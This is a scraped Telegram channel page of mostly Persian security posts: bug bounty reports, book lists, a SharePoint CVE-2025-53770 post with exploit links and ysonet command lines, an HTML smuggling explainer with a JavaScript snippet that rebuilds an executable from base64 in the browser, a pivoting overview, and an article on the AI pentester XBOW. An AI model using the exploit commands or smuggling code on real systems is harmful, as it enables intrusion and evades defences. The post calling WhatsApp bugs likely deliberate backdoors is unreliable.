RadvanSec – Telegram
RadvanSec
990 subscribers
180 photos
27 videos
142 files
593 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
این اولین بار نیست! آسیب‌پذیری‌های مشابه هر سال از 2017 تا الان گزارش شده:

RCE از طریق تماس تصویری (2019)
اجرای کد با فایل ویدیو (2020)
جاسوس‌افزار Pegasus روی واتساپ!

احتمال خیلی زیاد تمام این باگ ها تعمدی و backdoor هستند

#امنیت #Whatsapp #Backdoor #Hack

@ZeroSec_team
4😱1
📊 Watcher Summary Report

🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 11 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
BullShit Books :

1. Bug Bounty Bootcamp – Vickie Li

2. Web Hacking 101 – Peter Yaworski

3. Real-World Bug Hunting – Peter Yaworski

4. The Basics of Hacking and Penetration Testing – Patrick Engebretson

5. Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman

6. Hacking Web Apps – Mike Shema

7. The Hacker Playbook 1 – Peter Kim

8. Gray Hat Hacking

#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #BullshitBooks #CTF #EthicalHacking #HackTip

⭐️ @ZeroSec_team
👏5👎1
Nice Books :

1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto

2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)

3. Hacking: The Art of Exploitation – Jon Erickson

4. Advanced Web Attacks and Exploitation – Dafydd Stuttard

5. Web Security for Developers – Malcolm McDonald

6. Real-World Web Application Security – Andrew Hoffman

7. Bug Bounty Hunting Essentials – Carlos A. Lozano

8. Black Hat Python – Justin Seitz

#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking

⭐️ @ZeroSec_team
👍31
DE&TH_Guide_1_3.pdf
2 MB
#DFIR
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.

⭐️ @ZeroSec_team
1🙏1
#rce #pentest #redteam #ad #sharepoint #cve
CVE-2025-53770: SharePoint RCE (ToolShell)

Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit

Upd: https://github.com/irsdl/ysonet


ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 1 -c "calc"



ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 2 -c "C:\\temp\\ExploitClass.cs;System.dll"


Patched: July 20, 2025

⭐️ @ZeroSec_team
4
HTML Smuggling چیه و چرا خطرناکه؟

یه تکنیک خفن تو حملات سایبریه که هکر باهاش می‌تونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!

یعنی چی؟ یعنی به‌جای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML می‌فرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا می‌شه و فایل رو از صفر می‌سازه و به قربانی می‌ده!

مثال:

let file = atob("TVqQAAMAAAAEAAAA...");
let blob = new Blob([Uint8Array.from(file, c => c.charCodeAt(0))]);
let url = URL.createObjectURL(blob);
window.open(url); // یا auto download


یه فایل اجرایی که:

نه از نت دانلود شده
نه توی ترافیک دیده می‌شه
نه فایروال جلوش رو می‌گیره
و نه حتی آنتی‌ویروس متوجه می‌شه!

این یکی از روش‌های محبوب برای Initial Access هست.

#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess

⭐️ @ZeroSec_team
5👍2
«سلام به دنیای جدید امنیت با ظهور هوش مصنوعی»

دنیای آینده‌ی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:

۱. استفاده از AI به‌عنوان ابزاری فوق‌پیشرفته
۲. بهره‌گیری از خطاهای انسانی به‌عنوان راه ورود

#XBOW #HackerOne #AI #CyberSecurity #RedTeam

⭐️ @ZeroSec_team
1🔥1😱1
📊 Watcher Summary Report

🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 51 new items
🔹 INTIGRITI: 3 new items
🔹 YESWEHACK: 8 new items
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
2
Pivoting: تسلط مرحله‌ به‌ مرحله بر شبکه‌های داخلی

Pivoting یک تکنیک حیاتی در مرحله‌ی Post-Exploitation و بخش مرکزی Lateral Movement محسوب می‌شود.

Pivoting یعنی استفاده از host تسخیر شده به‌ عنوان نقطه عبور (bridge node) برای رسیدن به subnetهایی که از شبکه‌ی مهاجم (attacker C2) به‌طور مستقیم قابل دسترسی نیستند (non-routable/internal segments)

سناریوی رایج:

Exploit → Initial Access به DMZ

Recon: شناسایی internal segments (مثلاً با ARP scan یا route enumeration)

Pivot Setup: ایجاد مسیر ارتباطی
حرکت به سمت اهداف high-value مثل Domain Controllers، فایل‌سرورها یا اپ‌های مدیریتی داخلی

قبل از هر pivot باید route ها، firewall rule ها و ACL ها بررسی شوند. بدون visibility دقیق، هر گونه ترافیک غیرعادی می‌تواند باعث شناسایی عملیات شود.

#RedTeamOps #Pivoting #NetworkSegmentationBypass #AdvancedPostExploitation

⭐️ @ZeroSec_team
1👍1👎1🔥1
📊 Watcher Summary Report

🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 33 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
1👍1🎉1
Privilege Escalation Techniques.pdf
15.4 MB
Privilege Escalation Techniques

#Book #Privelege_Escalation #ZeroSec

⭐️ @ZeroSec_team
4
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
3
🤣51🔥1😁1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
4
#WebApp_Security
1. Exploiting an ORM Injection to Steal Cryptocurrency from an Online Shooter
https://blog.p1.gs/writeup/2025/07/06/Hacking-a-crypto-game
2. Delivering PHP RCE to the Local Network Servers
https://github.com/ZeroMemoryEx/PHP-CGI-INTERNAL-RCE
3. XSS in Google IDX Workstation
https://sudistark.github.io/2025/07/02/idx.html

♦️@ZeroSec_team
2
ورود | XBOW جایگزین متخصصان امنیت سایبری شده؟ واقعیت پشت پرده هکر هوش مصنوعی که HackerOne را تصاحب کرد

نویسنده: غلام محی‌الدین
مدت مطالعه: ۳ دقیقه | تاریخ: ۲۵ جولای ۲۰۲۵
یک مدعی جدید در دنیای امنیت سایبری

اگر هنوز اسم XBOW را نشنیده‌اید، همین حالا از بقیه عقبید.

XBOW، ساخته‌ی Oege de Moor (خالق GitHub Copilot)، یک تستر نفوذ خودمختار با هوش مصنوعی است که پایه‌های امنیت سایبری را به لرزه انداخته. در ژوئن ۲۰۲۵، XBOW با پشت سر گذاشتن هزاران هکر حرفه‌ای، به رتبه‌ی اول لیست HackerOne در آمریکا رسید.

اما این فقط یک ابزار معمولی نیست. XBOW خودش باگ‌های واقعی را کشف می‌کند، آن‌ها را اعتبارسنجی می‌کند و گزارش می‌دهد آن‌هم بدون دخالت انسان.
یا واقعا این‌طور است؟

بیایید بین تبلیغات و واقعیت، مرز بگذاریم.
XBOW دقیقاً چه کاری انجام می‌دهد؟

XBOW یک سیستم هوش مصنوعی است که برای اجرای تست نفوذ تهاجمی خودکار طراحی شده. این سیستم webpapp ها را crwal و scan کرده و آسیب‌پذیری‌هایی مثل:

XSS, CSRF, SSRF, RCE
را کشف می ‌کند.

و فقط به کشف بسنده نمی‌کند. آن‌ها را تأیید می‌کند، Exploit می‌کند و گزارش‌های باگ معتبر ارسال می‌کند.

در آزمون‌هایی مثل PentesterLab و Web Security Academy، XBOW بین ۷۵ تا ۸۵٪ از چالش‌ها را حل کرد. کاری که برای انسان ۴۰ ساعت زمان می‌برد، XBOW در کمتر از ۳۰ دقیقه انجام داد.

شگفت‌انگیز؟ بله. اما داستان به همین‌جا ختم نمی‌شود.
نه‌ آن‌قدر هم خودکار…

سازندگان XBOW ادعا می‌کنند که این سیستم "کاملاً خودمختار" است.
اما متخصصان و افراد پشت‌صحنه، نظر دیگری دارند.

واقعیت چیست؟

انسان‌ها محدوده باگ بانتی را تعیین می‌کنند

مهندسان اهداف را اولویت‌بندی می‌کنند

یافته‌ها قبل از ارسال به‌صورت دستی اعتبارسنجی می‌شوند

اگر خطایی رخ دهد، اسکریپت‌های جایگزین یا بررسی LLM (مدل‌های زبانی بزرگ) فعال می‌شود

یعنی بله، بخش زیادی از کار خودکار است اما همچنان بخشی از یک خط لوله انسانی محسوب می‌شود.
XBOW چه چیزهایی را نمی‌تواند انجام دهد؟

اگرچه XBOW در کشف آسیب‌پذیری‌های رایج عملکردی خیره‌کننده دارد، اما در برابر نقایص منطقی پیچیده کاملاً کور است.

محدودیت‌های آن:

🧠 باگ‌های منطقی مرتبط با بیزینس (مثل بررسی اشتباه سطح دسترسی)

🔗 اکسپلویت‌های زنجیره‌ای چندمرحله‌ای

🔐 باگ‌هایی که وابسته به محیط خاصی هستند

🤝 مهندسی اجتماعی و حملات فیزیکی

🎯 اولویت‌بندی ریسک بر اساس زمینه واقعی کسب‌وکار

به زبان ساده: هوش مصنوعی هنوز شهود و خلاقیت ندارد — دو عنصر حیاتی در دنیای امنیت سایبری مدرن.
آیا جایگزین شغل‌های امنیتی خواهد شد؟

بیایید سر اصل مطلب برویم.

بله… برای نقش‌های تکراری و سطح پایه.

اگر شغل‌تان فقط به اسکن XSS یا استفاده سطحی از Burp Suite محدود شده — قابل جایگزینی هستید. این دقیقاً همان نقطه قوت XBOW است.

خیر… برای متخصصان باتجربه.

این صنعت همچنان به انسان‌هایی نیاز دارد که توانایی انجام موارد زیر را دارند:

تحلیل فرایندهای تجاری

تفکر مهاجمانه

زنجیره‌سازی آسیب‌پذیری‌ها

اجرای حملات Red/Purple Team

مدیریت ریسک در شرایط واقعی

درواقع، AI در حال ایجاد نقش‌های جدید در امنیت است:
نقش‌هایی مثل ناظر سیستم‌های هوش مصنوعی، تحلیل‌گر تهدیدات، ردتیم‌های ترکیبی با کمک AI و...

درحالت کلی این رایتاپ تا اخر امسال احتمالا درسته ولی بعدا میزنه همه هانترارو اوت میکنه این هوش مصنوعی

#RedTeam #XBOW #Hacke #BugBounty

⭐️ @ZeroSec_team
2🔥1